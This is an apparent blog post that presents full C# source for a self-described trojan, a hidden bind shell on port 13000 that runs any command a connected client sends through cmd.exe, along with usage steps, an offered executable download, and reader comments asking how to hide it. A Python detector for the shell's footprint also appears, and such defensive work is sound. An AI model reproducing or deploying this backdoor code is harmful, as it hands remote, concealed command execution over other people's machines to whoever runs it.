Saturday, May 1, 2010

My own C# trojan - remote shell command execution

In this post I will present a simple "shell" I created using C#/.NET.
The trojan runs in the background, opens a listening port on the machine running it, and allows any connected client to execute shell commands on that machine.
This application is for educational purposes only (mostly my own).

How to use it?

Simply run the trojan on the target machine and connect to it through port 13000 using telnet or netcat. Once the connection is established, you can execute any shell command on the target machine.

code:

using System;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;

class Program
{
    [STAThread]
    static void Main()
    {
        ProcessStartInfo processInfo;
        Process process;
        TcpListener server = null;
        bool isFirst = true;

        try
        {
            // Set the TcpListener on port 13000.
            Int32 port = 13000;
            // Bind to the loopback address only: as written, the listener
            // accepts connections from the local machine only.
            IPAddress localAddr = IPAddress.Parse("127.0.0.1");
            server = new TcpListener(localAddr, port);
            // Start listening for client requests.
            server.Start();
            // Buffer for reading data
            Byte[] bytes = new Byte[256];
            String command = null;
            int i;
            string recv_char;
            byte[] msg;
            // Perform a blocking call to accept a single client.
            TcpClient client = server.AcceptTcpClient();
            // Get a stream object for reading and writing
            NetworkStream stream = client.GetStream();
            // Say hello (this fixed banner is sent to every client)
            msg = System.Text.Encoding.ASCII.GetBytes("Welcome Master! enter a command to execute or enter exit:\r\n");
            stream.Write(msg, 0, msg.Length);

            // Enter the command loop.
            while (true)
            {
                if (!isFirst)
                {
                    msg = System.Text.Encoding.ASCII.GetBytes("Enter a command:\r\n");
                    stream.Write(msg, 0, msg.Length);
                }
                // reset the command
                command = null;

                // Read until a newline arrives (one command per line).
                while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
                {
                    // Translate data bytes to an ASCII string.
                    recv_char = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
                    command += recv_char;
                    if (command.Contains("\n"))
                        break;
                }
                if (command.Equals("exit\r\n"))
                {
                    // If exit was entered, say goodbye and end the connection
                    msg = System.Text.Encoding.ASCII.GetBytes("Bye Bye Master...\r\n");
                    stream.Write(msg, 0, msg.Length);
                    client.Close();
                    break;
                }
                // Execute the received command in a fresh cmd.exe
                // (/C terminates cmd.exe after the command completes,
                // so state such as the current directory is not kept):
                processInfo = new ProcessStartInfo("cmd.exe", "/C " + command);
                processInfo.CreateNoWindow = true; // don't open a console window
                processInfo.RedirectStandardOutput = true; // capture output so it can be sent back
                processInfo.UseShellExecute = false; // required for output redirection
                process = Process.Start(processInfo); // start the process
                string output = process.StandardOutput.ReadToEnd();
                process.Close(); // release the process handle
                isFirst = false;
                if (output != null)
                {
                    msg = System.Text.Encoding.ASCII.GetBytes(output + "\n");
                    // Send back a response.
                    stream.Write(msg, 0, msg.Length);
                }
                else
                {
                    msg = System.Text.Encoding.ASCII.GetBytes("Sorry Master, command execution failed\r\n");
                    // Send back a response.
                    stream.Write(msg, 0, msg.Length);
                }
            }
        }
        catch
        {
            // Swallow all errors (client disconnect, failed process start) and exit quietly.
        }
        finally
        {
            // Stop listening for new clients (server is null only if setup failed).
            if (server != null)
                server.Stop();
        }
    }
}
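As an added example (not code from this post), here is a defender-side detector for the footprint this program leaves: a process that holds a listening TCP socket and spawns a fresh cmd.exe /C child for every received command, plus the fixed greeting it writes to each client on connect. The telemetry records, the allowlist and the sample pids are constructed and simplified, not a real netstat or EDR schema.

```python
import re
from dataclasses import dataclass

# Fixed greeting the post's server sends on connect: a cheap payload signature.
BANNER = b"Welcome Master!"
# Images that legitimately hold listening sockets and may spawn cmd.exe
# (assumption: tune this allowlist for the environment being monitored).
LISTENER_ALLOWLIST = {"svchost.exe", "services.exe", "sshd.exe", "httpd.exe"}
# Matches "cmd.exe /C ..." (also "cmd /c" and a full path), case-insensitive.
CMD_C = re.compile(r"^(?:.*\\)?cmd(?:\.exe)?\s+/c\b", re.IGNORECASE)

@dataclass(frozen=True)
class Listener:      # constructed record, like one 'netstat -ano' LISTENING row
    pid: int
    image: str
    port: int

@dataclass(frozen=True)
class ProcCreate:    # constructed record, like one process-creation event
    parent_pid: int
    image: str
    cmdline: str

def banner_match(payload: bytes) -> bool:
    """True if a captured server-to-client payload carries the greeting."""
    return BANNER in payload

def find_bind_shells(listeners, creates):
    """Return [(listener, [cmdlines])] for each non-allowlisted process that
    holds a listening socket and has spawned 'cmd.exe /C' children."""
    by_pid = {l.pid: l for l in listeners
              if l.image.lower() not in LISTENER_ALLOWLIST}
    hits = {}
    for ev in creates:
        lst = by_pid.get(ev.parent_pid)
        if lst and ev.image.lower().endswith("cmd.exe") and CMD_C.match(ev.cmdline):
            hits.setdefault(lst, []).append(ev.cmdline)
    return list(hits.items())

# Constructed sample telemetry: the post's program as pid 4242, plus benign noise.
SAMPLE_LISTENERS = [Listener(4242, "trojan.exe", 13000),
                    Listener(812, "svchost.exe", 135),
                    Listener(1337, "httpd.exe", 80)]
SAMPLE_CREATES = [
    ProcCreate(4242, r"C:\Windows\System32\cmd.exe", "cmd.exe /C dir"),
    ProcCreate(4242, r"C:\Windows\System32\cmd.exe", "cmd.exe /C whoami"),
    ProcCreate(812, r"C:\Windows\System32\cmd.exe", "cmd.exe /C gpupdate /force"),
    ProcCreate(1337, r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4"),
]
```

Running find_bind_shells over the sample flags only pid 4242 on port 13000 with its two cmd.exe /C children; the svchost.exe child is ignored because its parent is allowlisted.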
You may download the executable file from here.
Oh.. and don't forget to kill that process when you finish playing with it :)

-herzel

6 comments:

  1. Nice horse. It's just that any .NET code can be viewed using Reflector.

  2. Thanks! I wrote this code just to demonstrate how a simple trojan is written in C#. I don't think it's smart to write malware in .NET.

  3. Let me rephrase that: I don't think it's smart to write malware at all :)

  4. How do you make the console application invisible??

    1. Hey, in this given program the issue is that after executing the command, cmd is closed. What if I want to execute a sequence of commands which require the output of previous commands, like the directory-traversal cd command?
